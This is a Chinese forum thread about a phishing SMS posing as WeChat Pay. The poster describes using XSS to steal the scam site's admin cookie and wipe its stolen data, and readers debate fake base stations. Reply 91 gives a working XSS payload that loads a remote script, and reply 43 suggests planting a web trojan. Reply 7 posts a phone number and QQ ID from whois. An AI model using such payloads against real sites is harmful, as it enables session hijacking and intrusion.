这是一个创建于 3311 天前的主题,其中的信息可能已经有所发展或是发生改变。
昨天在微信官网上申请微信支付,今天下午就收到了一条短信
于是我就点开了这个链接,发现是 asp 后缀的,腾讯应该搞 php 的啊,我于是就发现有点不对头,我就往里面来了一发 xss 代码。
不一会儿就搞到了 cookie, 登录后台一看。。
第 1 条附言 · 2016 年 12 月 21 日
各位,应该是伪基站发送的,我查了下移动的短信详单, 没有 95017 的电话号码:
移动的短信详单:
我的手机收到的短信:
(我的手机还"智能"的给短信加了 logo )
移动的短信详单:
我的手机收到的短信:
(我的手机还"智能"的给短信加了 logo ) |
1
Showfom PRO 只能说有些人太好骗了
|
 |
2
SourceMan 2016 年 12 月 20 日
火钳刘明
这个是大新闻 |
 |
3
kimwang 2016 年 12 月 20 日
"放蛇“(钓鱼执法) ……
|
 |
4
TangMonk OP  102
我现在已经把上面被盗的信息全部给他删完了。。
|
 |
5
icodesign 2016 年 12 月 20 日
取款密码......
|
 |
6
HGladIator 2016 年 12 月 20 日 via iPhone
第一眼就看到了域名错误。
|
|
7
TangMonk OP 查了下 whois ,貌似是在上海祥和路,电话: 0215822656 , qq: 395849573958
|
 |
8
HFX3389 2016 年 12 月 20 日
我只说两个字,求教。
|
 |
10
sorcerer 2016 年 12 月 20 日 via iPhone
😂他在哪个页面中了你的 xss
|
 |
11
mrjoel 2016 年 12 月 20 日
所以说啊,还是老老实实用 PHP
|
 |
13
lyragosa 2016 年 12 月 20 日
转型 php 最好语言贴……
|
 |
14
815lbh 2016 年 12 月 20 日
大哥,受我一拜,好人啊。(。・∀・)ノ゙
|
 |
16
hlg002 2016 年 12 月 20 日
求教程
|
 |
17
wenymedia 2016 年 12 月 20 日 via Android
楼主干的漂亮
感觉把对方服务器肉鸡了 或者重定向到某榴… 更刺鸡 |
|
18
TangMonk OP @hlg002 https://www.google.com/search?q=xss+%E6%95%99%E7%A8%8B&{google:acceptedSuggestion}oq=xss+%E6%95%99%E7%A8%8B&aqs=chrome..69i57.2076j0j7&sourceid=chrome&ie=UTF-8
|
 |
19
hnnxn 2016 年 12 月 20 日 via Android
楼主好人
|
 |
20
x86 2016 年 12 月 20 日 1
php 我学还不行吗
|
 |
22
zhang1215 2016 年 12 月 20 日
楼主 666 ,再低劣的骗术也有人中招
|
 |
23
phieo 2016 年 12 月 20 日
顶楼主 现在社会需要你这样正直的人
|
 |
26
KenGe 2016 年 12 月 20 日
你用了 wifi 没还是用的自己的网络?
|
 |
27
asdwddd 2016 年 12 月 20 日
大家跟进看什么原因
|
 |
30
CerealKiller 2016 年 12 月 20 日 via iPhone
看网址 应该能看出不对头……学习了
|
 |
31
Felldeadbird 2016 年 12 月 20 日
哈哈,骗子反被楼主骗了。
骗子:哼哼哼,骗子! |
 |
32
jiangzhuo 2016 年 12 月 20 日
95017 确实是腾讯的客服电话吧。城里套路真是深啊
|
 |
33
marsLeo 2016 年 12 月 20 日
如果你在收到短信前,有短时间手机突然没信号,那有可能是伪基站发的短信。
|
 |
34
jacy 2016 年 12 月 20 日
数据库挂了还是本来就会错误
|
 |
35
mgna17 2016 年 12 月 20 日 via iPhone
Microsoft JET Database Engine 错误 '80004005'
未指定的错误 /include/db_conn.asp ,行 36 他的数据库被人玩坏了。。。 |
 |
37
subpo 2016 年 12 月 20 日
问题是...95017 确实是微信的客服号码,这个怎么弄的?
|
 |
41
smallaccount 2016 年 12 月 20 日
楼主做了一件大好事。
|
 |
42
WhyAreYouSoSad 2016 年 12 月 20 日 3
马云:祝各位阿 sir 在警察部一帆风顺。干杯!
|
 |
43
hack 2016 年 12 月 20 日 via Android
太暴力,后台登录挂个网马撸出来照片或者视频最好
|
 |
44
hahiru 2016 年 12 月 20 日 via Android
伪基站的话应该是撒网捞鱼的。碰巧遇到楼主,腾讯背了锅。
|
 |
47
f1r1ng 2016 年 12 月 20 日
是不是手机里软件有问题。。
|
 |
48
dreamwar 2016 年 12 月 20 日
基站伪装
|
 |
49
ming2050 2016 年 12 月 20 日 via iPhone
这个重点不是内鬼麼
|
 |
50
dahvlh 2016 年 12 月 20 日
= =,伪基站 去科技园撒网 专门调微信开发者... 这不太现实吧 而且注册也就一次的事情
得到微信内部查查是谁卖的了 |
 |
51
basefas 2016 年 12 月 20 日 via iPhone
没有人吐槽“登陆”的么(滑稽)
|
 |
53
nfroot 2016 年 12 月 20 日
@basefas 这货跟我一样,登陆和登录拼音输入法打出哪个用哪个……而且后台没过滤 XSS (我也是填表的时候做过滤……) 看来后台做个防止载入其他站点资源的那个功能是完全有必要的,我以前也想到说如果别人 XSS 我后台……后台地址藏好了也随时暴露……
|
 |
55
ahkxhyl 2016 年 12 月 20 日
我去 贴主~很屌 知道放 xss~~ 不仔细看 真的以为是腾讯发来的~~
|
 |
57
zhouyg 2016 年 12 月 20 日
牛掰,果然 php 才是王道。
|
 |
59
Patrick95 2016 年 12 月 20 日
应该是伪基站群发了短信,恰好赶上你微信支付了。
|
 |
60
TimePPT PRO 围观
|
 |
62
NaturalColour 2016 年 12 月 20 日
厉害了我的楼主
|
 |
63
Quaintjade 2016 年 12 月 20 日 via Android
可以查一下详单来分辨是不是伪基站,注意短彩信和增值业务都要查,因为有些增值业务也能发短信。
|
 |
64
cwz326237076 2016 年 12 月 20 日 via Android
wap.weixtqq.com 这不摆明说是假的么
|
|
65
ahkxhyl 2016 年 12 月 20 日
层主说的对 感觉有点像伪基站发的~~
|
 |
66
j8sec 2016 年 12 月 20 日 1
腾讯企业验证费用和验证是交给第三方做的, 这个第三方有重大嫌疑
|
 |
68
terence4444 2016 年 12 月 20 日 via iPhone
过两天去查详单 看看到底是不是伪基站
|
 |
69
wclebb 2016 年 12 月 20 日 via iPhone
申请微信支付有可能不是腾讯,而是第三方审核所在的公司。
|
 |
70
Tink PRO 强,无敌!
|
 |
71
shingoxray 2016 年 12 月 20 日
Good job !事关广大人民群众安全,建议向当地公安报案,并向腾讯安全应急响应中心报告。
|
 |
72
RobertYang 2016 年 12 月 20 日 via Android
哈哈哈 干的漂亮
|
 |
73
Aidea 2016 年 12 月 20 日
厉害,自己还是要加强学习啊~
|
 |
74
gotonba 2016 年 12 月 20 日
难怪现在可以通过对公账户打款来验证,看来第三方确实不安全,还得交 300 大洋=。=
|
 |
75
jedihy 2016 年 12 月 20 日 via iPhone
能不能写写入侵流程
|
 |
76
jookr 2016 年 12 月 21 日
[建议]
1 、用个插件自定义你的 UA (例如插入几个字符),大家写后台的时候在统一入口验证 UA 如果不包含那几个字符就 404 ,这样能防止 XSS 。 https://ext.se.360.cn/webstore/search/魔变 2 、 session 保存登录的 ip ,每个后台页面打开都判断当前 IP 是否等于登录时记得那个 IP 。 求还有什么方法或者更简便的方法防止被 XSS |
 |
77
cname 2016 年 12 月 21 日 via Android
如果是伪基站的话,怎么知道谁刚刚开通微信支付,刚好受害者周围部署了伪基站?
|
 |
78
lxrmido 2016 年 12 月 21 日
说起伪基站,大学时有一阵子只要发查询剩余流量的短信(移动卡)就会收到电信上网卡的推销短信……
|
|
80
TangMonk OP 楼上的各位,应该是伪基站发送的,我查了下移动的短信详单, 没有 95017 的电话号码:
移动的短信详单: 我的手机收到的短信: (我的手机还"智能"的给短信加了 logo ) |
 |
82
sola97 2016 年 12 月 21 日
有没有 xss 代码供学习一下
|
 |
83
tairan2006 2016 年 12 月 21 日
楼主好样的,佩服
|
 |
84
hoythan 2016 年 12 月 21 日
能不能提供一下你的 xss 代码学习一下.
|
 |
85
mazyi PRO 厉害啊厉害,随手注入了一下~
|
|
86
TangMonk OP 1
|
 |
88
BakCshi 2016 年 12 月 21 日
去知乎发个帖,搞个大新闻
|
 |
89
nevermlnd 2016 年 12 月 21 日
如果是 iPhone 的截图 回更有说服力
|
 |
90
ljcarsenal 2016 年 12 月 21 日
@TangMonk 你这个代码直接通过用户名输入框输入进去的? 服务端和网页限制一下输入长度是不是就没用了
|
|
91
TangMonk OP @ljcarsenal 不是,这只是一个 js 链接包含的内容而已,输入框里面填写
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的 js 地址';> |
 |
92
wavingclear 2016 年 12 月 21 日 via iPad
应该是伪基站,想骗普通吃瓜群众,骗到程序员是因为他倒霉
|
 |
93
sutking 2016 年 12 月 21 日 via iPhone
第一眼就发现域名有问题啊
|
|
94
sutking 2016 年 12 月 21 日 via iPhone
你看这 whois ,绝对坑你没商量
 |
 |
95
yamen 2016 年 12 月 21 日
我不懂,但我觉得你用的是安卓吧?
|
 |
96
fengjianxinghun 2016 年 12 月 21 日
nice !干得不错
|
 |
97
choury 2016 年 12 月 21 日
这个是针对个人的微信支付来诈骗的吧,任何人收到都可能受骗啊,基本有微信的都开了微信支付吧,只是你收到短信的时间比较巧吧
|
 |
98
zhangsimon 2016 年 12 月 21 日
你的手机什么 rom !!! 太干扰人了
|
|
99
TangMonk OP @zhangsimon 一加 2 。。氢 os
|
 |
100
samtoto 2016 年 12 月 21 日
next page>
|
Select Language